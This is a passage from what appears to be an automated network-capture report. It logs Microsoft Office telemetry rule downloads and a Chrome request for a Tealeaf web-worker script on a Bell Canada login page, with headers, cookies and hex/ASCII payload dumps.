                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      34192.168.2.94975413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 516b9b86-001e-0017-3b4b-2b0c3c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131155Z-17c5cb586f6r59nt4rzfbx40ys00000001sg00000000b0sk
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      35192.168.2.94976313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: daa440d4-101e-0028-4cca-2a8f64000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131156Z-17c5cb586f6f98jx9q4y7udcaw000000013g0000000087dw
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      36192.168.2.949767206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC2534OUTGET /styles/tealeaf/tltWorker.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC2441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Sun, 17 Jul 2022 16:18:19 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D899F8D3B19780"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Server-Timing: dtSInfo;desc="0", dtRpid;desc="-948986171"
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 30953
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000ae893a794f563cb08eb0589656094b09c56d01aeafd1beea65bbd7d42239bc5c08a1bd07611130002d2d00503262cc04401ba957f2addc10f593f74ca3277215ec43985b031f8357759b1dae4f365e9841981da4b5466348; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC13943INData Raw: 2f 2a 21 20 70 61 6b 6f 20 64 65 66 6c 61 74 65 20 31 2e 30 2e 31 31 20 77 69 74 68 20 44 6f 6a 6f 2f 52 65 61 63 74 4a 53 20 66 69 78 2e 20 54 68 65 20 66 69 78 20 63 6f 6e 73 69 73 74 73 20 6f 66 20 74 68 65 20 66 6f 72 63 69 6e 67 20 6f 66 20 74 68 65 20 61 73 73 69 67 6e 6d 65 6e 74 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 20 66 72 6f 6d 20 74 68 65 20 63 61 6c 6c 20 74 6f 20 27 74 28 29 27 20 74 6f 20 27 77 69 6e 64 6f 77 2e 70 61 6b 6f 27 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 65 6c 66 2e 70 61 6b 6f 3d 74 28 29 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 69 28 73 2c 68 2c 6c 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 68 5b 65 5d 29 7b 69 66
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC16384INData Raw: 2e 68 63 72 63 26 26 6e 2e 70 65 6e 64 69 6e 67 3e 72 26 26 28 74 2e 61 64 6c 65 72 3d 63 28 74 2e 61 64 6c 65 72 2c 6e 2e 70 65 6e 64 69 6e 67 5f 62 75 66 2c 6e 2e 70 65 6e 64 69 6e 67 2d 72 2c 72 29 29 2c 71 28 74 29 2c 72 3d 6e 2e 70 65 6e 64 69 6e 67 2c 6e 2e 70 65 6e 64 69 6e 67 3d 3d 3d 6e 2e 70 65 6e 64 69 6e 67 5f 62 75 66 5f 73 69 7a 65 29 29 7b 69 3d 31 3b 62 72 65 61 6b 7d 4c 28 6e 2c 69 3d 6e 2e 67 7a 69 6e 64 65 78 3c 6e 2e 67 7a 68 65 61 64 2e 6e 61 6d 65 2e 6c 65 6e 67 74 68 3f 32 35 35 26 6e 2e 67 7a 68 65 61 64 2e 6e 61 6d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2e 67 7a 69 6e 64 65 78 2b 2b 29 3a 30 29 7d 77 68 69 6c 65 28 30 21 3d 3d 69 29 3b 6e 2e 67 7a 68 65 61 64 2e 68 63 72 63 26 26 6e 2e 70 65 6e 64 69 6e 67 3e 72 26 26 28 74 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: .hcrc&&n.pending>r&&(t.adler=c(t.adler,n.pending_buf,n.pending-r,r)),q(t),r=n.pending,n.pending===n.pending_buf_size)){i=1;break}L(n,i=n.gzindex<n.gzhead.name.length?255&n.gzhead.name.charCodeAt(n.gzindex++):0)}while(0!==i);n.gzhead.hcrc&&n.pending>r&&(t.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC626INData Raw: 20 20 20 20 20 20 20 72 65 73 75 6c 74 2e 64 61 74 61 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 65 73 70 6f 6e 73 65 44 61 74 61 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 45 6c 73 65 20 73 65 6e 64 20 72 61 77 20 74 65 78 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 75 6c 74 2e 64 61 74 61 20 3d 20 72 65 73 70 6f 6e 73 65 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 74 4d 65 73 73 61 67 65 28 72 65 73 75 6c 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: result.data = JSON.parse(responseData); } catch (e1) { // Else send raw text result.data = responseData; } postMessage(result); }).catch(function (e


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      37192.168.2.94976113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 8e3eac93-d01e-0017-759c-27b035000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131156Z-15b8d89586f42m673h1quuee4s0000000dqg000000006hk8
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      38192.168.2.94976513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131156Z-16849878b78qfbkc5yywmsbg0c000000097000000000cn43
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      39192.168.2.94976413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131156Z-16849878b7828dsgct3vrzta700000000830000000000spk
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      40192.168.2.94976213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
